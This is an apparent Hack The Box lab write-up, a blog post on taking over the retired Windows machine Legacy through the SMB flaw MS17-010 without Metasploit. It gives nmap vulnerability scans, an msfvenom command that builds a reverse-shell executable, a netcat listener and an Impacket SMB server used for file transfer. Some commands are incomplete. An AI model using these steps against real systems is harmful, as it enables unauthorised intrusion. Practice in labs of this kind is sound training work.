Skip to content

Hack the box – Legacy without Metasploit

Legacy is a retired machine but since I wanted to do all the windows machines. the first one I did was legacy.

Tools used when exploiting legacy

  1. nmap
  2. Script from github
  3. msfvenom
  4. smbserver from Impacket
  5. whoami.exe


For the nmap used : nmap -sC -sV -O

found SMB was opened, scanned smb using nmap again : nmap -v -script smb-vuln* -p 139,445

found 2 vulnerabilites in smb:

  1. ms08-067
  2. ms17-010

Exploiting ms17-010

For manually exploiting ms17-010, have to first clone the following from github

git clone

after cloning, use msfvenom to generate an exe to get a reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o exploit.exe

now we have the exploit generated. let’s transfer it and execute it.

setup netcat to listen. then send the exploit to execute. after execution will get a reverse shell.

its a non administrative user.

Privilege escalation

for privilege escalation. We will first set up the smbserver from impacket and mount it in /tmp so can be accessed via a windows machine

root@kali:/opt# /usr/share/doc/python3-impacket/examples/ temp /usr/share/windows-binaries/

after setting up smbserver. will try to transfer whoami.exe to the windows machine.

after transferring the whoami.exe we got the NT AUTHORITY in the system.

That’s all for legacy.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: